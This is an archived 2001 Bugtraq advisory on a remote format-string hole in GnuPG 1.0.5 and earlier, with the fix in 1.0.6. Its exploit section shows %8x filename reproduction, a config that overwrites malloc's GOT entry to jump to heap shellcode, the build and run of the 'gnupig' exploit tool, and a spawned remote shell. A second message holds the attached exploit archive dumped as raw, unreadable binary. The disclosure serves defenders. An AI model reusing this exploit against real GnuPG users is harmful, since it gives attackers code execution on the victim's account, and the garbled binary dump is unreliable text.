6559151 2001-05-29 19:58 +0200  /235 rader/ fish stiqz <fish@analog.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-30  02:43  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17194>
Ärende: [synnergy] - GnuPG remote format string vulnerability
------------------------------------------------------------
---------------------------------------------------------------------------
      Remote arbitrary code execution vulnerability in GnuPG <= 1.0.5
              
               Synnergy Networks (http://www.synnergy.net/)
                     By: fish stiqz <fish@synnergy.net>
                           Released: 05/29/2001
---------------------------------------------------------------------------
              ( Will the REAL GnuPG bug please stand up? )
---------------------------------------------------------------------------

---------------------------------------------------------------------------
[ Contents of this Advisory ]

0. Introduction
1. Problem
2. Solution
3. Exploit Discussion
4. Credit and Thanks

---------------------------------------------------------------------------
[ Introduction ]

GnuPG is a very popular GNU replacement for the public key encryption
program PGP.  As described by its website (http://www.gnupg.org/):

> GnuPG is a complete and free replacement for PGP. Because it does not
> use the patented IDEA algorithm, it can be used without any
> restrictions. GnuPG is a RFC2440 (OpenPGP) compliant application. 

Hidden deep within its code is a format string vulnerability which
can be triggered simply by attempting to decrypt a file with a
specially crafted filename.  This vulnerability can allow a malicious
user to gain unathorized access to the account which attempted the
decryption.

---------------------------------------------------------------------------
[ Problem ]

The problem code lies in util/ttyio.c in the 'do_get' function.
There is a call to a function called 'tty_printf' (which eventually
results in a vfprintf call) without a constant format string:

>     tty_printf( prompt );

If gpg attempts to decrypt a file whose filename does not end in
".gpg", that filename (minus the extension) is copied to the prompt
string, allowing a user-suppliable format string.

---------------------------------------------------------------------------
[ Solution ]

The vulnerable call obviously needs the "%s" conversion:

>     tty_printf( "%s", prompt );

The newest release of GnuPG (version 1.0.6) contains this security
fix,  as well as implementing many new features.  It can be obtained
from http://www.gnupg.org/download.html.  All GnuPG users are
strongly urged to upgrade as soon as possible.

---------------------------------------------------------------------------
[ Exploit Discussion]

In order to show the severity of the bug, look first at how it is
reproduced.

1. Create a file with a valid format string as the filename.

  $ echo "hello, how are you friend?" > %8x_%8x_%8x

2. Encrypt this file.

  $ gpg -r fish@analog.org -e %8x_%8x_%8x gpg: this cipher algorithm
  is depreciated; please use a more standard one!

  $ ls %8x_%8x_%8x*
  %8x_%8x_%8x  %8x_%8x_%8x.gpg

3. gpg added the ".gpg" extension to the new encrypted file, give it a
different one.

  $ mv %8x_%8x_%8x.gpg %8x_%8x_%8x.el8

4. Now, attempt to decrypt the file.

  $ gpg %8x_%8x_%8x.el8

  You need a passphrase to unlock the secret key for user: "fish
  stiqz (bleh) <fish@analog.org>" 1024-bit ELG-E key, ID D31DF63D,
  created 2001-05-24 (main key ID 5ABD075F)

  gpg: %8x_%8x_%8x.el8: unknown suffix
  Enter new filename [ 80af5d9_ 80cefb8_ 80af5ca]: 

Now you will notice that the %8x's were expanded!  However, the
actual filename is not our format string.  The original filename,
which is stored inside the file as part of the encrypted data, is the
real format string.  So the file could be renamed again and still
produce the same result:

  $ mv %8x_%8x_%8x.el8 README.TXT
  $ gpg README.TXT

  You need a passphrase to unlock the secret key for user: "fish
  stiqz (bleh) <fish@analog.org>" 1024-bit ELG-E key, ID D31DF63D,
  created 2001-05-24 (main key ID 5ABD075F)

  gpg: README.TXT: unknown suffix
  Enter new filename [ 80af5d9_ 80cefb0_ 80af5ca]: 


The exploit I have created simply creates and encrypts a file that
exploits this vulnerability.  However, considering that there is no
possible way to determine what type of machine the file will be
decrypted on, the size of the remote environment, the location that
libc is mapped, etc... the exploit will require a lot of knowledge
about the remote system for it to work.  For this reason, this
exploit can be considered "Proof of Concept".

There were a few hurdles to get around while building this exploit.  

First, since this a remote attack, there are only two
ways to feed data to gpg.  1) Through the filename and 2) through 
the encrypted data inside the file.  Option #1 seemed easiest to
use, so I used it.

Second, since there are limitations on the size of a filename, 255
bytes on Linux systems for example, we need a small format string and
a small remote shellcode.  The format string and shellcode
combination would be located on the stack, allowing the Linux kernel
patch from the Openwall  Project to defend against this kind of
attack.  However, this is not acceptable for an exploit by fish stiqz
;-).  Before the vulnerable call, the prompt is created on the heap,
and the format string copied to it. The filename (our format string
and shellcode combination) taken from the data inside the file, is
also  copied to the heap, allowing two different places to store a
remote shellcode on the heap.  The first location is complicated by
the fact that the prompt is filtered through iscntrl(), escaping all
characters in the range of 0x00-0x1f and  0x7f.  But, since I thought
it would be fun to make some remote shellcode to get around this, I
chose to use the first location on the heap, but either one is fine.

Example exploitation:  (overwrite the GOT entry of malloc() to point
to the shellcode on the heap)

(from config.h in the exploit)

/* <FIXME> */

/* location of the *local* copy of gpg, used to encrypt the file */
#define DEFAULT_GPG_PATH "/usr/local/bin/gpg"

/* contents appended to the format string, or NULL if you want to skip it */
#define APPEND lnx_i386_remote_shellcode

/* only needed if appending APPEND is defined, NULL if you wanna skip */
#define ARCHNOP "\x90"

/* the overwrites (most definitely needed) */
short_write_t short_array[] =
{
    /* overwrite 0x080c9dc4 (GOT of malloc) with 0x080cca60 (shellcode) */
    { 0xca60, 0x080c9dc4 + 0 },
    { 0x080c, 0x080c9dc4 + 2 },
    { 0, 0 }
};

/* </FIXME> */


Make the backdoored file:

  $ make clean && make rm -f *~ *.o gnupig  gcc -Wall -O2 -g -c
  gnupig.c gcc -Wall -O2 -g -c common.c gcc -Wall -O2 -g -c file.c
  gcc -Wall -O2 -g -c shellcode.c gcc -Wall -O2 -g -c fmtstr.c gcc
  -Wall -O2 -g -o gnupig gnupig.o common.o file.o shellcode.o fmtstr.o

  $ ./gnupig -s -e 366 -a 4 -k fish@analog.org  [0] shellcode passed.
  [1] running gpg to encrypt the dummy file.  gpg: this cipher
  algorithm is depreciated; please use a more standard one!  [2]
  created dummy file successfully.

User runs gpg on the encrypted file:

  $ gpg *.el8
  ... 
  
Remote shell is spawned:

  (in other terminal)
  $ telnet localhost 16705
  Trying 127.0.0.1...
  Connected to localhost.
  Escape character is '^]'.
  id;  
  uid=1000(fish) gid=100(users)
  exit;
  Connection closed by foreign host.


There are a few other tricks you can do, like doing a return into
libc  attacks and writing the payload with the format string, which
can be performed by this exploit.  It is a very versatile tool.
Unfortunately, or fortunately (depending on your point of view),
these types of  attacks will also be unreliable (due to the fact that
we dont know the remote environment or how gpg is spawned).

-------------------------------------------------------------------------
[ Credit and Thanks ]

Thanks to the GnuPG developers for an excellent program.

Many thanks to all of those involved with this.  MaXX and dethy, you
have been some great guys to work with, thanks for all the help.

Shouts:
 - MaXX and dethy - you guys RULE!
 - scrippie for the format string generation ideas.
 - venomous for the late night irc conversation ;-)
 - ysyi & async.org

-------------------------------------------------------------------------

As always, if updates of this exploit or advisory are made, they will
be posted to my website: http://gibson.analog.org/

The exploit code is attached.

- fish stiqz
  Synnergy Networks
(6559151) /fish stiqz <fish@analog.org>/--(Ombruten)
Bilaga (application/x-tar-gz) i text 6559152
6559152 2001-05-29 19:58 +0200  /41 rader/ fish stiqz <fish@analog.org>
Importerad: 2001-05-30  02:43  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17195>
Bilaga (text/plain) till text 6559151
Ärende: Bilaga till: [synnergy] - GnuPG remote format string vulnerability
------------------------------------------------------------
‹½ß;gnupig.tarì<isÛ8²ùjþ
Œ2KŽ,봓8μŒã$ÞÍU™Lí¼J\*ˆ„$–)’Ãòf'ï·ow ÁCÎå8µo̊#G£Ñhô	h槡;Û½õ-ŸnwØݍà³ÛÛuñ³ÛéS=·ºûƒîp¿¿·º½^0¸ÅFß+õ¤qÂ#ÆnMÝx~y;ÅׁÐõ>3¹þv°X~çR
|ñÓíu»{r½k×4Ñúö{½=øÞ>ÝbÝo‚Méù›¯ÿmwê;bÊÆã£W/^¼z9~6[·¡ÄõE±ÐÚÝfÓÔ·7ðYI¬B³í]˞	·üLŒÃÈõ>ñÄ8Nàë¬i~œ0Ù¢Íb÷O1NÚµ¬ÔÝ™/|ežðNj³0Jš²1Ô㐊3mç<p¶ý‚{^`7%(h%KßY,ßôHºšÐ‹(jjL:N±rÏJ•4c×rpYgG‚'bŒÅYëâ'v¼-|ǝZß{q?áQûÿ¬Î雌ñ‘ýßëöåþvG£a¿Oû´³ÿ¯ã¹ýµu›iæaÓ b’¡ÚŒ³§~úú){pÈzngÄÄEènÂ&«û:1$8‹÷?Ùüþ?Üç^0ëÑì¡õõh=yþèé¯lcãíüDÛyÕg;3ëùcUqhÿ~ŒÕcëèˆÏlÛzõË?òŠN eP ¥AÀâ¹ð<;pðût‘€¤ëW€²hÞg?6±–eٞàþ}k#Z°)Ûþ?¶
ÃéJùy²->ŽZP+§Ýb;º)“-àCÍ:wìNp¿¦Í~|`Áó½™ò湶§hÿÙßdŒÈÿ~wÔ¯Ø{ÃùÏm×·½ÔìAœ8nЙƒì5‹<wR)ãÑË, \âÚ¬`ÅI[ÊRø~Ⱥ҈²Ø6;Ž"Ðö\ü±å³eÄÃPD¤0d·u¬5ó[Ö¿-¬Lá½Òî´Ù„J‚iú­;<d/{þ¼E-d_|¦„Û´	3C°ÍªËfÚbS’Ýù””›€Õ
öß{¿Ñ†±²îXõäíøÉ£“翽9Vu,úˆD’F>#ô>à¬+“ŽDe¦E£5L"m·~ê¬Ì&uýœ¹ëŽßhò´äÿ€½v8
’-ô²(Ûå M¥õ­gÏǞ‹P¢~4¨ÌèÝÎ)k ñ­úá¾Nšªcõ´Âù¼Ü•U
u>¾™Ê1§^ÏU¿–±ÎÝ$	*ÓÊ=Š/šV&8­ÍæÕ67֝;Ÿ;Mõӄ~8MÂî{Kª›ç[<™þ÷§`ê~—øOo¸ß«è0	nôÿ5<R~Ñò§§àÎ\pG)çd.”§Ü·5Ÿs&°2 C¼TÄ,	ØrÎ,\ƒ¤žÃ&Ò%\iÄâUœˆuÇ?ô/õQ–Z–žzùääi%<•æ&JC¹dói¢ON~qüàÁ+(=9Ë`J³ÛÆãLá
Ëf!8¯°ØÎHøv´
iRäû!=úãã'~{þvüôõÓñëGoŸ±ÆnG»nwâú»©¡BX~"ü$f¨ý`:š@ÑH&#em¤BÝ
êIƖT&´ŒÏܐãlŒýèõë㗏™ç_ŒÝÁݽq$A"ƙ_Jþ·b¾8 €”ƒÃ@º·3	Îi—Çõ¹ÕòÍѳ—¯^³Æû‹{]9/œBp.¢eä&ÀÍE*šÃ{6v¡CDɘ‚q#ßxñÕ»Sv¨”"¢¬¡±îE÷n×¾çØCÖ|úê-®Œ4×Zlé&s¨‡j›ïuY3›5DvTc]Ûs‡uهvVå¥ú¾QßÆÖÖi¿>Ø5xè¿'¶÷)’ÿjË|ÿ¯7„*þ7P,ãÿ7ñ¿ky¤ü×ËÏvX6ì÷˜$wA@1Š}ƒèD!.µF¸ŠÜÙ<aMؖ}XJèÿq¡þ.'O.g.äuƪ±Nð#†Ò/å¥ÅJ,ÒW$“¹Uœù©ç>J„4àÑQ™óxü§ˆ‚¸™9·^ ¾ÚˆG/Lû	å=Ó)¹`ðÊþú‹•ª§ÓnרÖÎU¡¶)´2«ee^ݲ6”çÕS¦»ðb‘v
Èòõô2`%iÔ±¡ƒˆs`ó±ðÄôV³Ø|{êFèi”Jc$u4mÔt硜Á“mÔ;!W^'X?]LÀú¯Æ)°€UÅ!IH”!ˆx)UË]éfæ‰ßj<]±È|±å³<ª‹{ڑÓøáºäåÜq€x1ÕÀ’¸wîÜb×Xòɀë€åpF•)“2dÕìfó3‘!„
åF66oÏ/î¿O6o{(kWá€ï(©!CblG4ÈæOJý¬h¶Úˆ¯=WÍ\ŸñØV¦K9…ø6Ëq?‡6ÀcDS Q
·Ä”Âs§hx>>þå·§ n%båGkíT ´Q66•s”½Û"2îL‹“J¨ÐPËܐ°„Ý:äÔÀå1Uƒ2¯(Ø%¹AÃŒlLYtÜw˜ãFÂN¾	lLÃm–·ÃØ[²bӏG³GG»’ç™â0‰íÔã“ö1Ì68B"žW\7I§Sµ¥ (ðíÒ6¿K¸…Ç1¡I•ŽQ&ƒÑG\¤„—JEŸIU Yc
g´‹<º-.¡!ër¯mml°
5·)T‡Èâ-µ^ËoŠ¦k9î2qTN”CÂMÖ˱*P©"¨Í¦1ðvF7S¥µZ`øöZy-‚jµL° ³Ï/Û},0Šx,fÈ.ïj±B€§Fk[·îd1UUv¬CX`‘4EÈ·½ô•äP@=ꁮ'†öqä	‚Æ×Þìͦ\{`ïÀû;™XÖST”Qè¨Au)
¼–JnÑT¥4è,€WTÕBw†ÝÉN‚mÂ'D‡o†²Ã%¬
BÑWŠz“üTA¢½f9ð
¸ìùZfs+„ ²ÐµEш „ë¨M%!”¡ÔRÄR™Û5¡Œ§oරsÈÌZ“ÂD_ªÝ§ðZ-S {«²3…íN]@ök8Ä®åÛà
bDüaY«_Â6÷ý@é
†ÆA›DSÌe êŒÍ,ÓHƒzy™Ú\똊-Û1;4®²¾H.ø
×|êåYþ›››©ÿý8GLµ¯…Þ&õ@÷
¹ÌŸ7Ž"‡‘³SÝh9Óg²Æ®ez%V
Ño #-È"U¢	{‰|Ã1a»* mVän…QV›¯Tf0—VµfQ΁Ö	$e¢€2M=é~ºÒêã08·Ï~,ÂÐc§Ãê´½ãÆaÉcKC¯ç~\þ×Ê» ´rêºÝ˔\þ퉞)âêˆ8!ó®ojÄxè½uOQófÝSÀ@Îû TÕË«0Þ¥ºԃ	§…ÞA]UﴕI™/Õ…­mðôÕýE”Ô
HÃÊô9Ëõª§
÷S]ãZнÓ6ɉK…¿šn¶­hºÀh­ƒl[•w^Íˋ¬‚`".ɝ|“"éîÅx<&Éߊ¯JP)qÕ[³ý%¬µ;z£º›AÔ-q7ÇÁBèèûª=K'ÐáP›>sÂ0
`6¨s­žÉƒz³*šW¶¹«F9(:wáâ‡þh"{½½K6çúE®¥mã<¿À“峕/E¹j‡ŒêŸpɶãǗ^®yAá¬p½®ëÜتÕe×B\¦þØìÂX¶­ß·ˆ@ÜO2ÖiðQ?P,²˜QxBŠ fQo2Å`ò:æ,Xžz'ô«H
4?È@}Cw1è­È݃?Ù÷RAAÌt¯ÐÆù·€ÊÎ)Q¹^DÞJ6«ù"J¥㑫®ù<p@'ƒ+.bJd½Ÿ^x¬ñ‚ÿþ{ƒý“‹E8eÍ·sîŸÅÌáË;ØiY•“ÍrÜ	'®¯7o‹aŸ‹±ðÏã6+P8;+R}Š
önÅM¦*̱‘ì¬ÙyŠrú‚nJ¬‹Ò`'[0@Xj…ƒÌ\¾æ²þ»‹SmÝ°m6Aïdۢؑ WÉ[“£@ØK4ä׬™wÞ	ÒR5ùü Iƒj(À’ESœûl3%3»ÀSCç{A³´nWËzß;qó\ÿSÌÿ}§óÃnùüÇ~¿{“ÿ»Ž§ÿ›ƒ5è¬`M¾ïè³ò}úǓo}û¦t†Ã(´,¼R„meN
jeèVš‡ã¤¬4d´Z¥“ªêDy"(Û
!àë²ÛL—$Ar~,;VIŒ•ï9]–žÚ.ÝWªOûd­Ög?°É'„·‹vQéí³ÂޕñªÎxÉ/ŽVP6â³eo
 õMfÍäw·ÊËüÿì˜ÇÚG˺æöÆøˆüŒz{eù?è÷näÿu<JþË[Ž;lAùAô5œt±XÉCo2…§LÔ:"_w¬Ã([Å»x­ ZJâ¹Z¼än©ñÔö¯X”ú. P,QäkϔXâ<T_Æ°åAæ˜I±çgõaÁ8
Cð×*ôÁºY8ëT}-ãiV¥Wh?y2×ïgbåf‡+žœ<?†êF@è: ÉáùJ*(h&ñ#¡Z‰¡„Ñ¥	<_,¿‚ò x4‹ñÐû·Jî6v"p`h‚ø"m–ƒŽ%~¨B~˜	¥Úr,„ã¢4	´o6ž½zqœETŠI}¸S…C›S¼\1ÅáQ™e£zÁbtKÎ]ƒ_؜†)èéÆ3ôk³gÁ’ñHà‰ËŸÉ…›†Ú]µ½ MzרÖD-ù‡QêûÈmÀ:士ù^îÈà+v5׃Bƚç
ÕDhª.­»"¯‘a ú6>!ÃP„
”U=Ñ°r#=`´nÓÓ2EgM¹2ù¡\Þ¹ë9H¨
	ªYœqÛ¤@ۜoä":`¶'Š‡¨d¶pCÆäPˆK›ý„;¯
h€oßÍ
ù=…9‰Œ>Ÿ¼|û¦U¨6\óœ…r|>äéÍ€_J£UNK4ٕÈ6X‰àYu£ƒg—‹k¦Àš¾Ym£#¼»
c‘$rpÕ´U:d¤¶‘lNûˆÛº_뀩Ýÿ’4qÀvV{;ðœòþN}ÏõÏrÙ¥r‡	YÍ¢‚ˆ>QèÈÐÝ÷ÖæŸÿ(û/¿Ñü
ŒÀÝÿö{úüo¿‡¿Òú7÷?®åQòòå7ƒ™sßñ„:}©éK_¸ÚÀÚ2¿0.bJ	%?kR
u6lî^fêÍ3¬Ñß9À/¦–@$Œóô’‘U ú£½OH43L½=L3µñ(ivL¥be™~¼
ñ°”ÊoZ6rò¸q~\C¦Š°h3•tÂ!ÂM`	T ™Bæ8:¶ÃJødÜ ž¸ü&©>Ú¢ :37Ÿ$Q]'¿¨æ°PÕÊXˆ6£:ãĂRn?Þ•&DÓ<ÅóŽ(F΍N:sCÛžû,–nS‘ՙ£8R¸ÈÜNŸâ¡JM*OÞÑ¡˜G)«ýIã”6TáUB´Àö˜F?¬‡×”Ü\\ÕnOªä'ru¯ÂˆrÒ¥&¨–y½îô’Ù¸x~	`cé;—5>¾üõ—ñVßÖîV~L)’åË,ü3:8d²IW×óèÿoø˜þ§ï…øÏ`0¼ùý¯kyÊúS –Rîb“0}¸²z!ôJ²¿>;~þüèÕããR‚ XŽBֈ×˃%¹õr©¯ù©®õb´¥²~àïDn‚ƒ(™¸>æGä‘ùÇxhލm¤X³EJ%ù’.D†ùÌRôöö»£¿µW7éBdãýÅ ÷þÂ¸{ïýÅpøþ¢ƒ»ðÊØ$+Êfö@Wc5¡j(šÀßÞT9PeërjbCÑÝò@ð>`j‚U#Õ› ${_7—¸@Ñ°'ÿu§¯ºMîÊñ÷‡9$l²Ÿ7Á™L §˜¾¿˜îÕBÜ-ÏBM~–32&lÎnßЌ
€ásOQÊ&Êt¢pè©&æÀ”Ê@Å&š’åfÃ	þIºLäν|õêOä
¦FOœ	üM÷5¥s\ Ù=,B<‡{Ðd"ðš`ñ=€roOövöÕ'¼ö%”=‰ƒHˆ£zG"8],ÖK	߇ðÙG|ºˆ£ä—n7Ïß%‡òßü(ý³wÎÝ8ˆVW<Æåú¿ßíöK¿ÿ:ì
önôÿu<Õk_ü¨@åRhŒG7‰x´"lj«)%ÛÏSÏŸ¸ž›¬Ð¤(þN`)Zþºò¡÷lÅ^ŠdDàf5çIÞßÝ].—XÕv|‘ìVêôüR÷ËfLJ—œdƒÙy‚Çxòª;ÚíßÛE;Ǻz"ê§Éþ媫¢oŽ=W´š¤3˜êW=
f­+EãJ½Ã‘?¨»}”¨a§–Õí°°Ÿ'¥ãV¯Ã^G8¨«ßa¿1Ž5è°cõ’ÁâJc¼#c
;ìüe(DBÈãW½‰",Wî9ž˜C„©RäéËßðF‘Çm:·‘ý‚J˜N<×Æ—Ð#æ`ÅÎ"¾`¯Ÿ¾î0ö#¶#w†æ6^Š“/ט,.%5ØÏ»­û–õ¸à±ŠzÓ1jðr+ÈÐP¿›“5Ÿ0'ëÕ€ƒ%„+ÈÆÂÉããGŒ{³ r“ù‚.aÚÜÇ`%<ñÂn"ÕWÐ;K ŧ7OŽúÃa—5_…‡á[Kۄ‡ðEþK‡YÖ3×q„T!AÇ	AªÊ—V‹rDÚãAÌfE‰Ýædž<IÄ"LT>Ö2;Æef€nsyߊ{ÐÁŽ0.ãXX‹		ºê
HÅá0¸·„¾sqƒ4FòD”óå®o¥>:EŒ¼5«C‘ðF¿’'1WèQàGhôè·®˜—ÕÎB6ÆË»¡z%*{® ûÖ°ß¼Ý$Y¹xTÊéÛr‚ñL$[Ù©)yû7µ±8žIõpfÆÍ_,‚ùl sšn±¦œ­8K‰ÒÀ9©§®y[ú7˨o+ç1F¿"Í%ç<@Ÿ|ˆ&ÎÉÐ};¡ŸóÑ´ë~Ä2£J)4½(NÉDXÛ¢P^Öª¹pýTFšñ˜€r¨…,j¡›ÿºBDd·ˆQäm&ä:.àb®ŠÆ«PW»æZ„êE×\CÓº“sä\õ“=rfÍ¸aÜE¬%5¶i›Gà¾X‚0€u•

¾M}«Õü^Ë<P¤‹Á<ˆpOM݋6³8
?ºñÍp“CÚÑéM—?YÁØI&˜‚	BÄä' dÕ
M'Xú^ÀÎ<Yx(va‰x”’‡uüP#f´œôŽ8¦Ñ À$™ú(xå´ªã`ÕN|ùÓtÎd‡âÊ°ˆf*£fA›yAp&wøžaS[ƛ®¨Ãð¶jØ#yø¡(ÏAˆ9%9Ëó£.$	1ˆú#ö<`¹<Ë0ÏÏ2é]Ø<?7ØC†·ŠÔŸ…šü8;’N§$,Ü£;+Ň؎(@`Øî¾ìl»!ˆž\;Éß²
#ß C´u„J
Ds)C‰G|ñƒ׋Ͷ¡Ìx-¼ °Ð!qâ8JLKñ½ó‘A‹™ø6›¹ç¤r¹.ñTÐ)@E‘`q^®ð.¼»Z:/ƒe[‹3Sšé2ZéÎØÿÂòà’`à*œGH#“–°ÿÓÞµÿ¶៏ÅÆÅERNR$'N®r ËE€	.zÅ95(’’XÉ$+J~ èÿÞùföE‘rrm®A1EO&¹Ü×ìì<¿]hšŠVɚE"*„e1RžÄÜ&ªŸwêö¼z{88|Ú#Á_ßü©7Ægº$H¨Ó'ÃÓ³gON»:æ&fû`opÔ;|JìîÔHo½úétðü謘	ßêȈZ»Èh«r3%fA¯3¸P˜+ý«úqNâ?^ҏ(™N~¼”;QøqDü•R°Î ]ÃO£Äùk¨¦øÏ
ü½Øö@!`ë­«7ol_V<ýaÛÐÝ63O$*¥4R¶âœoMäÄ	ÓØF‹	Wk³¶9Åá:ì²çnžpvÔvÁûÜ}&2@|XAs±„%DšMê¼æ
2ùèŠlÈ£Fº¤ñ‡rúçqÿü—sKkÞ­ÿY2s}ø7)lP¥0Þ
æýk5iù›Vi©ÔDb2ôü–†!ƒ]\o‘Ù³ï$„#¢‰5ÔD¼Ò4˜}J݄wÂ2¨+W°¬\ã]‘¸^4ÇMK8¼2&V%
ͳ®Þ¢é•ý$»NiϔxÜ·(‹Üže:‰Ðœ+`ÆÝ YGý~_P2BÚ3úMºË^æLù˜’!g	’‡7k¿JÁ“ Õ¤Ìa
 Q9c‹*£Á-¥Éô‡©F
fÄh.H ¦šòi@:j”ëƒ>Ï5ƒ9ÍMû|³Š—ÜépE¢{,Y™´í¦ËXÆÞÕÄRܙFÊJ3^`¬Äèæ£EWO6O†k\ßäMW4Môj7¤
quçsª{6¯ìÉLA‡øŒùYPçj‹¿ÐÇÞ²‚¡þ0¤Õ˜€5Ѐ¥Ý ð”ðçD¸¬ìÁͼgô.×Ópö—ól—*Ï*$zœ·I„¤Þ}«çPœ8ÉmAcb¸G	ÄÇmi$³OC	Öýcðˆ¶8O)ŸbÄÜñÍ&Ö$¶—™±ò:îI{É*K–P‘‰uCÆägÐloÐҀHéïKâe6…ÁܶÔ"Ï"•è™û~eK¸#¨âЋµÑ¨ýÞɾáê¸×¡Oü”L!ݬëR}7ð”ÈLšùè^Γ°èòèÔ–­€Ï}Jk׶¸Ý#L.H£giœÕÚBä­,\­m©Oºvhe8ɉͼJxûtëÊ5Äë§!,ÇÀ²&VØ®Ä!6n‚2¬(à†ÏÌÀ"¬Ó¯«’2

¢/¿Y«ÎY‰À_op;œò˜ƒÛçSLáÆòˆ×

/|¨`‰CwÒ%‚7$y~»¯A•-šh?¤–äzã-ÍxC-p¸>%L6´ß¤XÕK¥Ç,žŽea*䢴ÁµV+û„ßžÇY¯îRk»ƒº‹<Ûj$ŒW7íÁm^L„ÚŒ›®±³‡ñý?†ñ|+ßXx¢77ŽsHáLFôÅc>ƒG=|ÈÑíÊY<â;ƒ‹bE•S†p”Ž>=(Úñ؜¸²ã±däìxè<ì*®S7ۖÿ¦Ž”Kÿ±.Ü+¡¡?yöLõB `,j
<½Ô·è9\h
H4_–°ðuõ~ªùð£Ý
½§rÃÆÙéf¹¼#¦÷6\j`É­Ó̪ªÒœ®ýˆ5l…Ðéàg?³Š‡ˆ$æmbn9³Y‘ÃÃe‡¿CK-K„9/çX/BÎWw¥ááóþ€þ
©ºKÂjF¢†0![OÆ،·
¡­¿}láYJC„nÒød8ژ²ŽšÉŸm6¡9Ò<vµ°5I)¼KBà|Th„åÐÊʺw«AàDºã‘¢˜XÅj°Q3´úA b‘¨CàFö*Â;Xì„a4ðۊé¿HVxlöóŠ@þzíùl`¤ªVžÃø!£‚kØë‰éuA?6«6‘™Á ÍÑ^v6âh×irÓéj8|	K¢»¶?]		¾“l•h«o;Þ$v±RÇ
†ˆ¾Շ!Qê*v˜Ü@zŽº:_×p§Ý¶_MìÇüK·[L§1I±KdٖNdˆöYR/Wü6ԘâlxÆæsdÙu¾¼Nì$§0ì¹D0H“õœ4|õ€õèIBR%KB3¬d5ۈƐ¿Ð5õps´•Vc5.…r¨ÞVtÔÊûùÛñ¼\Ab©õåUeßY‘[ÄɘXOe®“,¿‚'ȔY2xÇÆ¥«ÈXÕ¥ƒ°PÍå]ªª°¼Ë"0ϯ9“Á+HØP+[uSÄlv0®X£^`¨ŒW«ù*DX0ŸçˆzZòÂrˆojïäHiCû,ÂÝwÀãªÄ:ò°.æl‡öƒçþ>tè÷¾¼ø+¿KŸÁÿ§ŸOêçÿîó¿ÿ+—Äÿ&·â!Cö^*A¾ÌɌÿΞèù͎øÂÌnw+®ü›ðß­Ô¿çÅK7æŠë;Hœ@\t	äHàð±ÙD.Yë2$pXóíò=Œ÷SÚñ6«H²¯ÎÁH녞{ТCՌµ²ïÀ”+ÉRnE¯1IDù9îœ:>Ëé–é•2Y'úYI{õeÓ”AM9!Åû
?/üœmƒþ(v©Ïb´X	ú̌äWêP'hˆ|~¦Î“¡:Vý¯×ëªâ‡TÇËÅM§m¹M]RŒvIÿ=91Ý©'îÒó““ÖE֒wñ{åýž¶j±cöÙµ÷ބ?@¥µÒrä3WÚLä淟ng
7–‘÷&?þCæÏEfþÖsheΣ»¥XŒ¤,ÿè™@¶†(¶‰â¦iÛלŒG1}áDµ..ZÇ
³ÄyA˜§ú›’Y«>¾•Ò«ûJ¯>Wzz_ééçJ_ßWúús¥'÷•žì*ÝL¦Ø ©Ø§Ú류Ãí÷ƒCÀ‰â»Çµ7ãÿç—аnÑ£Â'âG±ƒË׺¥Pd%5Ï?hD3vShr–Ç¢<¶ù`«/À¤>OK›!C媀K
ç“ltÜƦCÏÔI|’OÚ̞¢SCx2ÖäÀÏs”3l¦žËß×ÉprÃ<®#W=¸·)é´{à¿Ú…±Ñ ôÎæà×tm†ìZ°¤éð«#õ=›”^—ô%¬J/½áÑK˜–^0>ÈKõ«rv]•/²ý…‹u/¹XW¡ßHlå½pû=AXˆE觱3ð^…¯ò¡…|.å´bg†
Zy³7®a¾	厒Õ]åÍòbmÓG“­,—fä|•Âã‹5â±*ɆŒuÒ‹@ªUŠŸî*ž+€y-Ã;çk*?G/i1@ÑVk’$c:RÏþ%"¹Ã=ßfpÖÕ,²]ôÇu5™ÕÀ”=oÛîï?q‚oiañu.LÄ=¨áKò«Eñìê¼1ZÛtR‡>£Ã­¼ƒ¦@´Á©hæ'¢NõIÿõÝørüË»®þõê\ÿ:}ýþ»©T‰>²OÿÄ®@·#Ä¡ԖÆ¯NFáh1*Fåøtœ€“¼=s°ÂDÓќ|N´`dm%­‘Ì®êä:ß,Û"ðv52ÏÀ`ùëd\S:4¥Íˆî*ÎШÍßX˜oØù3ÂvÓۅyÛ#¡ûÞ/Íû•‰6¿<6/×fàÕys‰Ó]%0¹ÛEâdrXß֊™Jûñ=ÉΏu:ºhpÞgê)=@™A}”L{ôÅvuMJˆÝHØ:Te‚FèÇtÕ?ŸšGÃuÐA'T ›ºg†¤ZcÖ\–q·O‡ò¾¢£Cù'ØÛuCÝð5E‘=_,ݜä¶wï»Þ„Ð`kǝ†wÉRÀG4~¼ñÚ¹)ÑÙîªC˜ŽÀ$;7AžÏ¯~V‹ÏˆÝñŽÚ]=ö¶Ë’•^ ¿ÿ;…ªæìѵjFaÎø´«˜FîN0ø®¹Í2²8nÆMV5õ×b?Hƒ»f8*(OVω%ÂI,ô•ú»8²ÖZÍr½)†›uN”žF’2`õn#¬JÔë1Ñ97â(A¬`¹YÝFE5-·Ò/ç|YÁsÞq\Ù´} eW3f¡8tv¦éºUí<¯˜ˆæ6O½Î¶Ä!Ö	ûh‚JsÄ*³Ìæ
ÇB<¯_múgß͟–GPŸsñ94_è­~^“Æ·6Ñí¯ýµ¿ö×þÚ_ûkí¯ýµ¿ö×þÚ_ûkýG׿!‡Ô˜ 
(6559152) /fish stiqz <fish@analog.org>/------------